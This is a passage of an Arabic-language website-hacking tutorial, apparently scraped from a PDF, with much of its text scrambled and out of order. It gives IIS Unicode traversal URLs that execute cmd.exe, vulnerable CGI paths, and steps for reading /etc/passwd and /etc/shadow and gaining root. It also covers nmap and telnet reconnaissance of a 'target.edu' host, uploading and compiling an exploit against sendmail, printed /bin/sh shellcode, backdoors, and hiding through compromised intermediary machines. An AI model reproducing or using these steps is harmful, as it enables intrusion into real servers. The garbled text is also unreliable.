‫‪\:%255cwinnt/system32/cmd.exe?/c+dir+c‬‬

‫‪235‬‬

adsamples/..%255c..%255c..%255c..%255c..%255c../
\:%255cwinnt/system32/cmd.exe?/c+dir+c
\:scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c /
msadc/..%c0%af../..%c0%af../../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
UONICODE ‫حاولت قد المستطاع انى أشكل فى أنواع‬
‫ هذه مثال عليها‬CGI ‫أما بالنسبة الى ثغرات الـ‬
cgi-bin/view-source?../../../../../../../etc/passwd /
cgi-bin/phf/
cgi-bin/wwwboard.pl/
cgi-bin/AT-admin.cgi/
cgi-bin/info2www/
cgi-bin/environ.cgi/
‫هذه وباقى العديد من الثغرات يعنى ل يقتصر المر على هذه الثغرات وراح أقسم الثغرات لك بحسب نظام‬
‫التشغيل‬
NT : Uni code , bofferoverfollow , tftp
Liunx : Get Access , CGI , buffer overfollow , PHP , send mail , ProFTPD,
,WU-FTPD, Kernel Exploits, rootkits
UNIX : Get Access , CGI , buffer overfollow , PHP , send mail , Kernel
,exploits, rootkits, ProFTPD, WU-FTPD
،،،‫انتهى‬

236

‫"استغلل لينكس في اختراق المواقع "‬
‫>ةةةةة ةة ةةةة ةةةةةة ةةةةةةةةةة<‬
‫>ةةةةةة‪<Black_sNiper :‬‬
‫هذا الموضوع مخصص لمن أراد التعامل مع لينكس في اختراق المواقع وليس لديه الخبرة الكافية فيه‪...‬‬
‫سوف يكون هذا الموضوع عن العمليات التي يستحسن القيام بها بعد الحصول على كلمة السر والنجاح في‬
‫الدخول على النظام‪..‬‬
‫أول يجب ان تعرف بأنه يمكن ان تدخل على بعض النظمة باستخدام بعض الكلمات المشهورة وتوجد بعض‬
‫النظمة تسمح لك بتنفيذ أمر واحد ثم تقوم باخراجك من النظام بعد ذلك وأفضل تلك الوامر هي ‪.:‬‬

‫‪who‬‬
‫‪rwho‬‬
‫‪finger‬‬

‫‪237‬‬

‫وتستفيد من هذه الوامر بأنك تستعرض اسماء المستخدمين للنظام وبذلك يمكن ان تستخرج كلمة السر من‬
‫نفس السم وذلك لن بعض المستخدمين يستعمل كلمة سر مشابهة تقريبا لسمه مثل ‪.:‬‬
‫‪username : Black‬‬
‫‪password : Black2‬‬
‫وفي بعض النظمة تستطيع الدخول بكتابة ‪ test‬أو ‪demo‬‬
‫من الملفات المهمة والتي يجب عليك استخراجها بعد دخولك على أي نظام ‪.:‬‬
‫‪etc/passwd/‬‬
‫‪etc/group/‬‬
‫‪etc/hosts/‬‬
‫‪usr/adm/sulog/‬‬
‫‪usr/adm/loginlog/‬‬
‫‪usr/adm/errlog/‬‬
‫‪usr/adm/culog/‬‬
‫‪usr/mail/‬‬
‫‪usr/lib/cron/crontabs /‬‬
‫‪etc/shadow/‬‬
‫الحساب ‪.: bin‬‬
‫وهو مهم حيث يحتوي على حساب المستخدم ويوجد به معظم الملفات المهمة وقد يوجد ملف كلمة السر واذا‬
‫كان كذلك فيمكن‬
‫)أحيانا( اضافة كلمة سر خاصة بك وتضيف حساب دخول )روت( لك !!‬
‫والطريقة بسهولة كالتالي ‪.:‬‬
‫‪$ ed passwd‬‬
‫وأخيرا تقول ‪ exec login‬وتكتب أي اسم وبذلك تكون انت مدير النظام!!‬
‫ما الذي سوف تواجهه عند دخولك على أي نظام بكلمة سر واسم مستخدم ؟!!‬
‫عند دخولك الى النظام ستقابل احدى هذه الحتمالت ‪.:‬‬
‫اما انك استطعت الحصول على حساب مدير النظام )الروت( أو انك حصلت على حساب مستخدم آخر‪..‬‬
‫في البداية تكتب المر التالي ‪.:‬‬
‫‪$ pwd‬‬
‫والنتيجة تظهر ‪.:‬‬
‫‪$ /usr/admin‬‬
‫النتيجة اظهرت انك استطعت الدخول على المدير وبذلك تستطيع التعامل مع كامل النظام بدون قيود‪..‬‬
‫اذا ظهرت نتيجة غير تلك النتيجة ‪ ..‬فمثل ‪:‬‬
‫‪$ /usr/Black‬‬
‫فهذا يدل على انك دخلت على حساب هذا المستخدم!!‬
‫ولعرض ملفات هذا المستخدم تكتب التي ‪.:‬‬
‫‪$ ls /usr/Black‬‬
‫وسوف يعرض لك ملفات هذا المستخدم ‪.:‬‬
‫‪mail‬‬
‫‪pers‬‬
‫‪games‬‬
‫‪bin‬‬
‫ولكن هذا لن يعرض ملف ‪profile.‬‬
‫ولكي تستعرضه تكتب التي ‪.:‬‬
‫‪$ cd‬‬

‫‪238‬‬

:‬‬ ‫‪$ cat /etc/passwd‬‬ ‫‪:/:root:F943/sys34:0:1:0000‬‬ ‫‪sysadm:k54doPerate:0:0:administration:usr/admin:/bin/rsh‬‬ ‫‪checkfsys:Locked.‬‬ ‫للبحث عن معلومة معينة تكتب المر التالي ‪.:‬‬ ‫‪$ write‬‬ ‫ولمعرفة من يوجد على النظام نكتب التي ‪.:‬‬ ‫‪$ grep phone Black‬‬ ‫وهذا بافتراض انك طلبت ارقام الهاتف الخاصة بالمستخدم الخر‬ ‫ولعمل نسخ من ملف الى ملف آخر تكتب التي ‪.‬‬ ‫‪$‬‬ ‫اذا اردت قراءة محتويات ملف فسوف تكتب المر التالي ‪.:‬‬ ‫‪$ passwd‬‬ ‫ثم سيطلب منك كلمة السر القديمة وهي طبعا معك!! وتدخل كلمة السر الجديدة ‪..root‬‬ ‫‪:bluebox::70‬‬ ‫‪239‬‬ .‬ولستعراض ملف كلمات السر نكتب ‪.:0:0:check file system:/usr/admin:/bin/rsh‬‬ ‫وقد يظهر حساب آخر للمدير كالتالي ‪.43:34:3:Mr doooom:/usr/Black‬‬ ‫وهذا يعني انه يمكن للمستخدم الحتفاظ بكلمة السر لمدة ثلثة اسابيع بدون تغيير وانه يجب ان يغيرها كل‬ ‫ستة اسابيع ‪.‫‪$ ls -a‬‬ ‫‪:‬‬ ‫‪:‬‬ ‫‪profile..:‬‬ ‫‪$ cat letter‬‬ ‫وهذا اذا افترضنا ان الملف المطلوب هو ‪letter‬‬ ‫اذا اردت تغيير كلمة السر فما عليك ال ان تكتب ‪..:‬‬ ‫‪$ ls /etc/group‬‬ ‫‪root::0:root‬‬ ‫‪adm::2:adm.:‬‬ ‫‪:Black:chips11.‬‬ ‫استعراض ملف المجموعة كالتالي ‪.:‬‬ ‫‪$ who‬‬ ‫‪safadM tty1 april 19 2:30‬‬ ‫‪paul tty2 april 19 2:19‬‬ ‫‪gopher tty3 april 19 2:31‬‬ ‫واذا اردت قراءة الملف المحتوي على كلمات السر المظللة يجب ان تكون قد دخلت على النظام باستخدام‬ ‫حساب المدير نفسه ‪ .:‬‬ ‫‪$ cp letter letters‬‬ ‫اذا اردت عمل محادثة مع مستخدم آخر على اتصال فتكتب المر التالي ‪.

. supercomputers‬و غيرها‬ ‫كلمه ‪BOX‬‬ ‫النظام الذي سوف نقوم باختراقه يحتوي عاده على العديد من اليوزرز ‪..‬بالضافه لليوزرز‬ ‫تسطيع ان تطلق على الرئيس هناك كلمه ‪ . root‬و هو يكون ‪.‬و لكنها قديمه و ليست ‪up to date‬‬ ‫لذلك اكتب لكم هذاالدرس المطول لكي يكون مكانا للمبتدئين يمكن ان يستفيدوا منه‬ ‫و اتمنى فعل ان يحوز على اعجابكم ‪(:‬‬ ‫بعض المصطلحات الهامه ‪:‬‬‫كثير من الناس يحبون ان يطلقوا على كل من ال ‪ pc ..‫ويمكن ان يحتوي ملف المجموعة على كلمات سر أو ليحتوي !!‬ ‫اذا كان ليحتوي على كلمة سر فانه يمكن ان تصبح انت مديرا للنظام في حالة دخولك بكلمة سر لمستخدم‬ ‫عادي وليس كمدير للنظام وذلك بعدة طرق ‪..‬‬ ‫‪240‬‬ ... servers .‬‬ ‫انتهى‪،،،‬‬ ‫" شرح مفصل من اللف إلى الياء في احتراف اختراق‬ ‫المواقع عن طريق لينكس "‬ ‫>منقول<‬ ‫>الكاتب‪ :‬ايسر <‬ ‫‪UNix Usage IN HackinG‬‬ ‫اهل بكم جميعا‬ ‫في البدايه احب ان انوه ان هناك العديد من الدروس الجميله فعل ‪ . superuser‬‬ ‫و هو الدمين او المدير على النظام‪...

. u...‬تريد ان تخترق اجهزه مبحره في النترنت ‪.‬‬ ‫ النترنت‬‫‪ ...‬دعنا نبحر على النترنت ‪(:‬‬ ‫انا عارف انك حصلت على الدرس ده من النترنت ‪ ...........s.‬‬ ‫بل يجب ان تلوم صانع كروت الفاكس الداخليه هذه ‪(:‬‬ ‫اوكي ‪...‬‬ ‫خلص ‪ . winmodems‬‬ ‫لماذا لنها مصممه اساسا للعمل تحت نظام التشغيل ‪ ... windows‬بل تحتاج الى اي نظام مشتق من نظام‬ ‫التشغيل اليونيكس ‪.‬‬ ‫ان لم تجد مكانا تحصل منه على اللينكس يمكنك مراسلتي على ايميلي و نحدد مكانا‬ ‫لتسليمك نسخه من الماندريك ‪ 9‬او الريد هات ‪ ) 7...‬‬ ‫فكل المودمات الداخليه ‪ internal‬يطلقون عليها ‪..‬تريد ان تخترق ‪.‬للينكس مميزات كثيره ‪.....‫بالنسبه لنظمه التشغيل ‪:‬‬ ‫طبعا ‪ .‬‬ ‫‪9x‬‬ ‫اذن اقل حاجه حتى تخترق جهاز او سيرفير شغال على اليونيكس ‪...2‬ثمن السطوانات البلنك و النسخ فقط (‬ ‫على اي حال ‪ .‬اذن ‪..‬‬ ‫‪-2‬طبعا ‪ ..‬يوجد العديد من المودمز الخارجيه مثل ‪acorp ..‬لن اساسا يجب ان تعرف المودم بتاعك على اللينكس‬ ‫حسب التوزيعه اللي عندك ‪ ...‬يجب ان تكون ملما بنظام التشغيل هذا‪..‬انت انسان لينكسي ‪ .‬جميل جميل ‪ .‬لكن هذا كان عن طريق الويندوز‬ ‫‪ ...‬اما بالنسبه للمودم الخارجي ‪ external‬فهو مودم حقيقي ‪real or true modems‬‬ ‫‪ .‬حتلقي ان اللينكس لم يجد اي مودم موصل بالجهاز ؟؟‬ ‫ما هذا ‪ .‬تريد ان تخترق جهازك ام ماذا ؟؟‬ ‫اه‪..‬مجاني ‪ . windows‬ارجوك ل تلوم اللينكس ‪..‬ل يمكنك ان تخترق باستخدام نظام التشغيل ‪ .‬‬ ‫لذا من الفضل انك تركبه في جهازك ‪...‬و من الفضل لك ال تستعملها ال اذا كنت ترغب في تركيب سيرفير‬ ‫على الجهاز‬ ‫‪.‬و نادر لما تلقي جهاز شغال على الويندوز ‪nt .‬ما هي توزيعات اليونيكس ؟؟و اللينكس ؟؟‬ ‫بالنسبه لليونيكس ‪ .‬فهو منقسم الي قسمين ‪:‬‬ ‫‪ -1‬يونيكس تجاري ‪ ).‬‬ ‫اذن يجب ان تبحر الى النترنت من نظام اليونيكس ‪ .‬مستقر ‪ .‬‬ ‫يوجد اللينكس ‪..‬لذا فيمكنك تجاهله الن ‪(:‬‬ ‫اما المجاني فيوجد منه عده عائلت‬ ‫‪BSD‬‬‫و هي القدم و الصعب في الستعمال ‪ ..‬و لماذا ل يصلح الويندوز؟؟‬ ‫لسبيبن ‪:‬‬ ‫‪-1‬النترنت اغلبه اجهزه شغاله على اليونيكس سيستمز ‪..‬ماذا ‪ .‬ل تتعجب ‪.‬لكن انت اليوم انسان مختلف‪ ..‬معظم اادوات و اكواد الكسبلويتات مصممه للعمل في بيئه اليونيكس ‪..‬حاول تعرف المودم ‪ .‬ادخل على النترنت من خلل ال ‪ isp‬وذلك من خلل نظام الليونيكس ‪(:‬‬ ‫‪241‬‬ ..‬امن ‪ .‬‬ ‫حسنا ‪ .‬يوجد منه العديد من التوزيعات و ان كان افضلها هي ‪ ) SuSe‬لم اجربها و لكن اسمع الكثير من‬ ‫الناس يشكرون في هذه التوزيعه (‬ ‫اما بالنسبه لسهل توزيه فهي ‪ MDK‬و قد و ضعت هنا بعض الدروس الخاصه بالمندريك‬ ‫يمكنك تحميلها و قرائتها ‪..‬غير مجاني (‬ ‫‪ -2‬يونيكس مفتوح المصدر و مجاني ‪open source‬‬ ‫بالنسبه لليونيكس التجاري ل يمكن ان تركبه على جهازك العادي ‪...‬يمكنك تطويره ليلئم امكانيات جهازك ‪.... robotics‬‬ ‫يجب ان تتاكد ان المودم يكون ‪ serial‬و ليس ‪USB‬‬ ‫على اي حال خلينا في موضوعنا‪.‬و هو طبعا غني عن التعريف‬ ‫طبعا ‪ ....‬‬ ‫اوكي ‪ ..‬ذه فلسفه محترمه ‪...‬السؤال هو لماذا هذه النظمه بالذات ‪ ..

‬‬ ‫‪ -5‬هذه النقطه تعتمد على بعض تقنيات الفريكينج ‪ ....‬انت فهمتني غلط ‪ ...‬‬ ‫‪REdirecting‬‬ ‫فحص المواقع ومنافذ ال ‪: TCP‬‬‫يجب عليك قبل ان تقوم بالختراق ان تعرف كيف يمشي النترنت ‪ .‬مش قصدي يعني تروح لنت‬ ‫كافيه ‪(:‬‬ ‫جهازك =====< الجهاز الضحيه ‪ .etc‬اختصار لكلمه ‪daemon‬‬ ‫مثال ‪ :‬لو سيادتك قمت بزياره هذا العنوان من خلل المتصفح مثل ‪ www...‬‬ ‫طيب ماهو الشيل اكاونت‪ :‬هو عباره عن خدمه حيث يمكنك من خللها التحكم في جهاز من بعيد و هذا‬ ‫الجهاز عليه نظام اليونيكس‬ ‫طبعا من غير ان تقوم باختراق هذا الجهاز ‪..‬لكن‬ ‫جهازك======< جهاز وسيط======< السيرفير الضحيه ‪...‬لكي يقوم‬ ‫الديمون هذا من خلله بتقديم الخدمه الملعونه =‪D‬‬ ‫و هذه بعض الخدمات مع البورتات الخاصه بهم ‪.‬ركز معايا ابوس ايدك =‪D‬‬ ‫المفروض ان كل جهاز على النت بيكون فيه بورتات مفتوحه ‪.‬هذا البورتات يمكنك ان تقوم من خللها‬ ‫بارسال الداتا‬ ‫من جهاز الى ذلك الجهاز ‪..‬انه يعتمد على بروتوكول يدعى‬ ‫‪TCP\IP‬‬ ‫و بعض البروتوكولت الخرى ‪.‬هذه البورتات المفتوحه ) المفتوحه فقط ( تكون على استعدد دائما لتلقي الداتا من‬ ‫ريموت بوكس‬ ‫دائما ما ترتبط البورتات المفتوحه بما يسمى بخدمه ‪<< service.‬و ل حتى باسامي مزوره لن هذا قد يجعلك عرضه‬ ‫لكشف الي بي الخاص بك‬ ‫و من ثم ال ‪ isp‬ثم رقم هاتفك و صباح الفل ‪..‬‬ ‫طيب ‪ .... telnet .‬ل ل ‪ .......‬و يوجد العديد ممن يقدمون هذا الحدمه مجانا ‪.‬ده مش مامون ‪.‬‬ ‫و هذا الخدمه ‪ service‬تكون مستضافه من خلل ديمون ‪daemon or server‬‬ ‫اذن ‪ .mil..‬‬ ‫ثم بعد ذالك يقوم الموقع المطلوب بارسال كود الهتمل الخاص بالصفحه ‪index.‬ده ممكن يكون مثل جهاز مخترق من قبل او شيل اكاونت ‪.‬لكن طبعا هناك كثيير‬ ‫‪FTPd‬‬ ‫‪FTP‬‬ ‫‪21‬‬ ‫‪telnetd Telnet‬‬ ‫‪23‬‬ ‫‪(!sendmail (yes‬‬ ‫‪SMTP‬‬ ‫‪25‬‬ ‫‪apache‬‬ ‫‪HTTP‬‬ ‫‪80‬‬ ‫‪qpop‬‬ ‫‪POP3‬‬ ‫‪110‬‬ ‫حرف ‪ d‬في اخر كلمه ‪ ftp .....‬ت‬ ‫‪ -2‬اياك ان تتباهى باختراقاتك ابدا اما غير المهتمين بامور الهاك ‪.‬الديمون هذا اذا قام صاحب الموقع بفتحه في السيرفير فانه يقوم بفتح منفذ في السيرفير ‪.‬ده كده كويس اوي‬ ‫طيب ايه الجهاز الوسيط ده‪ ..html‬واوامر اخرى كثيره ‪.‬‬ ‫‪ -4‬حاول ان ل تخترق اجهزه خطيره و مهمه مثل ‪ gov .‬او سيرفيرات اجب عليك قبل ان ‪ edu.host.net‬ماالذي يحدث ؟؟‬ ‫يقوم المتصفح بالتصال بالموقع من خلل بورت ال ‪ TCP‬رقم ‪80‬‬ ‫ثم يقوم بارسال المر‬ ‫‪ GET /HTTP/1.‬‬ ‫و طبعا هنك و سائل عديده لذلك لن اتطرق اليها لن هناك العديد من الشروح المتميزه في مجال الحمايه‬ ‫وازاله الثر‬ ‫الخصهم في نقطتين او ثلثه ‪:‬‬ ‫‪-1‬ايك ان تحاول ان تسجل في موقع تحاول اختراقه ‪ ..1 /index.‬لعمل اخفاء لرقم تليفونك عن مزود الخدمه لديك ‪.‬‬ ‫‪-3‬احاول ال تخترق دائم من خلل جهازك ‪ ...‬و‬ ‫غيرها من هذا النمط‪..‫اهم حاجه قبل الشروع في الختراق هي ان تحاول ال يتم اليقاع بك و كشف محاولتك لختراق سيريفير‬ ‫معين ‪.html‬‬ ‫‪242‬‬ ...

‬اشهر هذا السكانرز هي الداه ‪ nmap‬بواسطه ‪ fyodor‬و لحسن الحظ يوجد نسخه‬ ‫منها خاصه بالويندوز و ‪ !!.edu‬‬ ‫‪.xx‬‬ ‫)‪The 1518 ports scanned but not shown below are in state:‬‬ ‫‪(closed‬‬ ‫‪Port‬‬ ‫‪State‬‬ ‫‪Service‬‬ ‫‪tcp open‬‬ ‫‪ftp/21‬‬ ‫‪tcp open‬‬ ‫‪telnet/23‬‬ ‫‪tcp open‬‬ ‫‪smtp/25‬‬ ‫‪tcp open‬‬ ‫‪http/80‬‬ ‫‪tcp open‬‬ ‫‪pop3/110‬‬ ‫‪Nmap run completed -.‬و لكنه ايضا عباره عن‬ ‫برنامج بسيط ‪...‬‬ ‫من خلل ما ال ‪ ..‬و ان شاء ال سنحاول على مدار الدرس باستخدم الموقع ‪ target.'[^' Escape character is‬‬ ‫‪..target.1 IP address (1 host up) scanned in 34‬‬ ‫‪seconds‬‬ ‫اذن لقد قام ال ‪ nmap‬بعمل فحص شامل على الموقع و قام بمعرفه المنافذ المفتوحه كم ترى!!‬ ‫اذن يمكننا ان نعرف ايضا اي الخدمات و ال ‪ daemons‬الموجوده في الموقع ‪target.edu (xx.03$ nmap -sS target.‬يمكنك من خلله التصال باي موقع بمنفذ معين من خلل ال ‪.‬‬ ‫اتبع التالي ‪:‬‬ ‫‪bash-2..org‬‬ ‫‪( /( www.uk/linuxdude/e3sar‬‬ ‫طيب‪...03$ rpm -i nmap-2.co..rpm‬‬ ‫ثم نقوم بالتشغيل ‪ .53 by fyodor@insecure.. port scaners‬السكانرز هي عباره عن برامج تحول ان تتصل بالسيرفير المستهدف‬ ‫من خلل جميع المنافذ ‪.xx.‬ايه ده ‪.xx.xx.edu FTP server (SunOS 5..‬اذن كيف تحصل عى المعلومات هذه ‪. 2.lycos..Trying xx...org/nmap‬‬ ‫‪:(Interesting ports on target.‬فكر معي ماهي هذه الداه؟؟؟‬ ‫نعم انها التلنت ‪ .‬؟؟‬ ‫احنا مش اتفقنا ننسى الويندوز ده خالص =>‬ ‫‪/http://members. TCP‬تعال نشوف مثال ‪:‬‬ ‫‪bash-2.03$ telnet target..edu‬‬ ‫‪Starting nmap V..edu‬‬ ‫لكن يلزمنا اداه معينه للتصال بالموقع من احد هذا المنافذ ‪..insecure...53-1.edu‬كمثال لموقع‬ ‫مستهدف ‪.‬من خلل التلنت ديمون ‪ .i386.‬اه ‪ ..Connected to target.‬صحيح ان التلنت هوه خدمه ‪.‬بالنسبه للينكس يمكننا ان نحصل على نسخه ‪ nmap‬على هيئه ‪rpm‬‬ ‫و لتركيبها اتبع التالي ‪:‬‬ ‫‪bash-2.xx‬‬ ‫‪...xx..‬و ذلك لمعرفه اي البورتات المفتوحه‬ ‫في هذا السيرفير ‪.‫الشيء الطريف ان ال ‪ daemons‬دي مليئه بالثغرات المنيه الخطيره ‪.6) ready 220‬‬ ‫‪243‬‬ .‬و هوه ده اللي احنا محتاجينه‬ ‫=<‬ ‫اذن لكي تقوم باختراق موقع يجب ان تعرف اي ال ‪ daemons‬الموجوده عل السيرفير لذلك يجب عليك‬ ‫ان تعرف‬ ‫ماهي المنافذ المفتوحه في السيرفير المستهدف ‪....edu 21‬‬ ‫‪.

org ( /( www.xx.xx.edu ESMTP Sendmail 8.2.. 2.'[^' Escape character is target.11.edu Starting nmap V.03$ telnet target.1.122 .Trying xx.edu (xx.2.edu .insecure.xx The 1518 ports scanned but not shown below are in state:) (closed Port State Service tcp open ftp/21 tcp open telnet/23 tcp open smtp/25 tcp open http/80 tcp open pop3/110 TCP Sequence Prediction: Class=random positive increments (!Difficulty=937544 (Good luck Remote operating system guess: Linux 2.03$ nmap -sS target.1 IP address (1 host up) scanned in 34 seconds 244 .xx.0/8. 24 Sep 2000 220 09:18:14 -0 (EDT) 400 quit target.Connection closed by foreign host ‫ و ان اصدار ه هو‬sendmail ‫ هو ال‬smtp ‫ايضا استفدنا معلومات قيمه هي ان ديمون‬ 8.9.0/8.53 by fyodor@insecure.edu closing connection 2.11. ‫جميل حميل‬ ‫لكن توجد مشكله وهي ان بعض المكعلومات قد يمكن ان‬. ‫ الموجود و على نظام التشغيل‬daemon ‫ال‬ ‫تكون مزوره او غير صحيحه‬ : ‫ازاي ؟؟؟تابع معايا كده‬ nmap ‫بالداه‬ bash-2.quit .xx.0.edu 25 ..3 ‫طيب لماذا نحتج الى هذا المعلومات ؟؟ لن الكسبلويت و الثغره الموجوده دائما تعتمد على‬..Goodbye 221 Connection closed by foreign host ‫اهااااا‬ (: ‫دول دلونا على معلومات قيمه اوي اوي‬ SunOS 5.Connected to target.0 221 .14 Nmap run completed -.xx .org/nmap :(Interesting ports on target.6 ‫ نظام التشغيل هناك هو‬-1 sunOS ‫ اللي بييجي مع نظم السن‬standard ‫ ديمون الف تي بي هناك هو ال‬-2 : ‫تعال نجرب بورت تاني نتصل بيه من التلنت‬ bash-2..3. Sun.9.

Password required for luser 331‬‬ ‫‪:Password‬‬ ‫‪.‬‬ ‫‪sh-2..‬‬ ‫كده انت رفعت الكسبلويت بتاعتك للشيل اكاونت ‪.(ASCII data connection for program.‬كل اكسبلود و له اوامره الخاصه في‬ ‫الكومبايل و له طريقه في التشغيل‬ ‫تظهر هذا الطريقه في التعليق البرمجي او في ال ‪../program‬‬ ‫ملحوظه ‪ :‬عيب اوي انك تاخد المرين دول كقاعده مسلم بيها‪ .c‬‬ ‫ثم انسخ الكود ثم افتح تيرمينال تاني و اتصل بالشيل و الصق الكود في ملف و سميه بامتداد‪c.Transfer complete 226‬‬ ‫‪ftp> quit‬‬ ‫‪Goodbye 221‬‬ ‫طبعا هذه الطريقه ن خلل ا ‪ftp‬‬ ‫و هي غير محببه لنها تقوم بعمل ملفات اللوج لذلك يفضل لك ان تقوم بنسح سورس كود الكسبلويت و‬ ‫لصقها في ملف في الشيل ‪..‬اعتقد نه حيكون زعلن منن و حنا مش عايزين الدمين يزعل مننا لذلك‬ ‫استخدمنا الختيار ‪ Ss-‬على اي حل فان عمل سكان لموقع يعتبر عمل شرعي ل مشاكل فيه =‪D‬‬ ‫لمزيد من المعلومات راجع‪:‬‬ ‫‪bash-2.6) ready 220‬‬ ‫‪Name: luser‬‬ ‫‪.‬و دي موجوده بكثره على النترنت‬ ‫‪245‬‬ .com‬‬ ‫‪Connected to shell.com FTP server (SunOS 5.03$ ..‬كده احنا قمن بعمل سكان على الموقع و لكن ممكن احد الدمينز لو عرف ان اننا قمنا بفحص‬ ‫موقعه ‪ . usage‬‬ ‫ استغلل الثغرات المختلفه ‪-:‬‬‫هذا اهم جزا في الموضوع ‪.shell.42.253.User luser logged in 230‬‬ ‫‪ftp> put program.c‬‬ ‫‪.03$ vi exploit.com‬‬ ‫‪.03$ ftp shell.03$ man nmap‬‬ ‫رفع ادواتك على شل اكونت ‪.57982 150‬‬ ‫‪.‬لكن نقدر نقول ان المعلومات اللي جمعناها كفايه و‬ ‫ممكن تمشي‬ ‫طيب ‪..c‬‬ ‫‪sh-2.c -o program‬‬ ‫‪sh-2.18...‬‬ ‫وكومبايل للكسبلويت و بعدين اعملها رن على الهوست المستهدف‬ ‫‪sh-2.‬‬ ‫)هذه الخطوه اذا كن عندك شيل اكاونت و مش عايز تخترق من جهازك (‬ ‫اتبع التالي ‪:‬‬ ‫‪bash-2.03$ gcc program.03$ ls‬‬ ‫‪program.PORT command successful 200‬‬ ‫‪.c (204.‫يانهار اسود ‪|:‬‬ ‫نظام التشغيل اللي الده قامت بتخمينه هو لينكس !!!!!!‬ ‫مش كان ‪ !!!!!! sunOS‬اه يا و لد الكلب =@‬ ‫بس احنا برده لزم نعرف توزيعه اللينكس الوجوده ‪.‬بمجرد ان تعرف ماهو نظام التشغيل عند الموقع المستهدف و ايضا الديمونز‬ ‫الشغاله على السيرفير‬ ‫فيمكنك ان تذهب الى اي دتا بيز اللي بتقدم اكسبلويت ‪.

.htm‬‬ ‫فيه حاجه لزم تعرفها ‪..03$ telnet myshellaccount 23‬‬ ‫‪.net/less/NEtworks/124.‬و انما تستخدم جهازا وسيطا او شيل‬ ‫اكاونت ‪.xx‬‬ ‫‪.'[^' Escape character is‬‬ ‫‪Welcome to yourshellaccount‬‬ ‫‪login: malicioususer‬‬ ‫‪(Password: (it doesn't display‬‬ ‫‪246‬‬ .cn/hack....‬طريقه لدخول الى الشيل اكاونت كالتالي‬ ‫‪bash-2..com :‬‬ ‫‪www.insecure....‬‬ ‫من اسهل و اشهر الكسبلويتات هي البفر اوفر فلو ‪ ."x80\xe8\xdc\xff\xff\xff/bin/sh‬‬ ‫اها‪.‬مقسمه الى ديمونات و نظم تشغيل‬ ‫و لكن ‪.‬طبعا ممكن تلقي شيل كودس لجميع نظم التشغيل في مواقع‬ ‫السيكيورتي المختلفه‪.‬اول حاجه شيل عادي ‪...‬‬ ‫‪.securityfocus.11.‬‬ ‫تاني حاجه و ده المهم بالنسبه لنا مايسمى بالرووت شيل ‪.pharaonics..‬لذلك يجب علينا ان نعرف نظم التشغيل المستخدم في السيرفير‬ ‫لو شوفنا كود اكسبلويت معينه ممكن نلقي ده‬ ‫‪= []char shellcode‬‬ ‫"\‪xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b‬‬ ‫"‬ ‫"\‬ ‫‪"x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd‬‬ ‫"\‪...co.linux.za‬‬ ‫مثل ده فيه كل حاجه ممكن تتخيله ‪.html‬‬ ‫‪...‬طيب زي ما قلت ان كل اكسبلويت مختلفه عن الخرى و يجب عليك ان تقرا الكود بتاعها او التعليقات اذا‬ ‫كنت ل تفهم في لغه البرمجه ‪.‬‬ ‫طبعا انت لو اخدت رووت شيل على السيرفير اذن فانت كده تمتلك كفه الصلحيات و ممكن تعمل كل اللي انت‬ ‫عايزه ‪..com.EDU‬‬ ‫يمكننا ان نستخدم الكسبلويت الخاصه ب ‪ sendmail 8.‫‪http://www..‬ماهي الكسبلويت ؟؟‬ ‫الكسبلويت عباره عن سورس كود عاده مكتوب فبلغه السي او البيرل المهم ان‬ ‫الكسبلويت دي تقوم باستغلل منطقه معينه في السيرفير ‪.‬ممكن تستعمل الرووت شيل ده كجهاز و سيط زي ما قلت في اول الدرس‬ ‫دتا بيز صغيره للكسبلويتات هي ‪www...‬في حاله ‪TARGET..‬ان لما تشغل اكسبلويت على سيرفير معين ‪.‬ايه الفوائد اللي جتعود عليك )غير طبعا‬ ‫اختراق الموقع (‬ ‫حتحصل على حاجتين اتنين ‪.xx.Connected to yourshellaccount‬‬ ‫‪..‬دهه للينكس و يقوم بتشغيل الشيل اللي في المسار دهه ‪bin/sh/‬‬ ‫طبعا لو السيرفير بتاعك شغال على نظام تشغيل اخر اذن يجب عليك ان تغير الشيل كود‬ ‫ده الى اخر يناسب النظام المستهدف ‪.Trying xx.‬‬ ‫زي ما قلت يجب عليك البا انك متستعملش جهازك في الختراق ‪ .xx.‬مش عارف ايه السند‬ ‫ميل اساسا ؟؟‬ ‫طيب رووح للدرس ده و نت تعرف ‪:‬‬ ‫‪http://www.org/sploits.‬يقوم هذه الكسبلويت بعمل ) دربكه في الديمون (‬ ‫مم يؤدي الى تشغيل الكود الذي تريده‬ ‫يقوم هذا الكود بتشغيل شيل في السيرفير لذلك فهو يسمى شيل كود ‪shell code‬‬ ‫طبعا يختلف هذا الكود تبعا لنظام التشغيل ‪ .0‬او اي ديمون اخر‬ ‫على فكره العيال ديما اسمعهم يقولوا ان السند ميل هو اكبر ديمون معرض للختراق ‪...

03‬‬ ‫طيب لو عندنا اكسبلويت للسند ميل اسمها ‪exploit...‬على اي حل مش موضوعنا دهه‬ ‫طيب احنا دلوقتي عايزين نحتفظ بالموقع دهه ‪.edu‬‬ ‫جميل جميل ‪$.‬اذن فقد اخذنا رووت على السيستم ‪....‬‬ ‫طبعا الباك دورز في موضوعي ده تختلف تماما عن الكلم الفاضي ده و ل مؤاخذه‬ ‫طبعا الباك دورز دي عايزالها موضوع لواحده ان شاء احطه لكم قريبا ‪ .‬اه =| =|‬ ‫ايه الكلم ده ياد يا ايسر ؟؟؟؟‬ ‫هاك اتاك =| !!!!!!‬ ‫اسف نسيت ‪(= .. ibm../exploit 25 target.‬و الحل ؟؟‬ ‫بس احنا دلوقتي رووت و ممكن نعمل اللي في نفسنا ‪.‬تذكر الثلث اجهزه اياهم‬ ‫جهازك‪ <-----‬جهاز وسيط‪ <------‬الجهاز المستهدف ‪.03$ gcc exploit.‬ده شغل اللمرز لن عيب اوي انك تفرد عضلتك على موقع ‪edu.‬صعب ان النورتون يكشفه و ممك‪.‬اذن نركب باك دوور يسمح لنا بالعوده بعد ذلك في‬ ‫اي وقت ‪.com etc‬‬ ‫او المواقع السيئه المحتوى كالباحيه او التي تسب الدين ‪ ..‬تذكر ن تحاول ان تتجنب رفع الكسبلويتات بالف تي بي على 